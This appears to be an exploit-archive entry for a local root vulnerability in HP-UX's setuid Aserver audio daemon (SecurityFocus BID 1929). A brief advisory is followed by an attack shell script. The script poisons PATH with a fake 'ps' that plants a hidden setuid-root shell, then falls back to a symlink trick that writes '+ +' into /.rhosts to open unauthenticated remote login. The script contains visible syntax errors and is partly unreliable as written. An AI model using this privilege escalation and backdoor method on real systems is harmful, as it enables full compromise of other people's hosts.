source : http://www.securityfocus.com/bid/1929/info

Aserver is a server program that ships with HP-UX versions 10.x and above that is used to interface client applications with the audio hardware. Because it talks to hardware, it is installed setuid root by default. 

During normal execution, Aserver executes "ps" via the system() libcall, relying on the PATH environment variable to do so. As a result, a user can modify their PATH environment variable so that it includes an arbitrary program called 'ps' before executing Aserver. When Aserver is run with the -f argument, the offending system() function will be called and the attacker's version of ps will be executed as root. 

This is a trivial root compromise.


#!/bin/sh
#
# HP-UX aserver.sh - Loneguard 18/10/98
# Simple no brainer path poison followed by a twist [ inspired by DC ;) ]
#
cd /var/tmp
cat < _EOF > ps
#!/bin/sh
cp /bin/csh /var/tmp/.foosh
chmod 4755 /var/tmp/.foosh
_EOF
chmod 755 ps
PATH=.:$PATH
/opt/audio/bin/Aserver -f
if [ -e /var/tmp/.foosh ]
        # Hmmm, you not like that technique?
        cd /tmp
        rm last_uuid
        ln -s /.rhosts last_uuid
        /opt/audio/bin/Aserver -f
        echo "+ +" > /.rhosts
        # Haha, my Kungfu is the best!
fi
echo Crazy MONKEY!
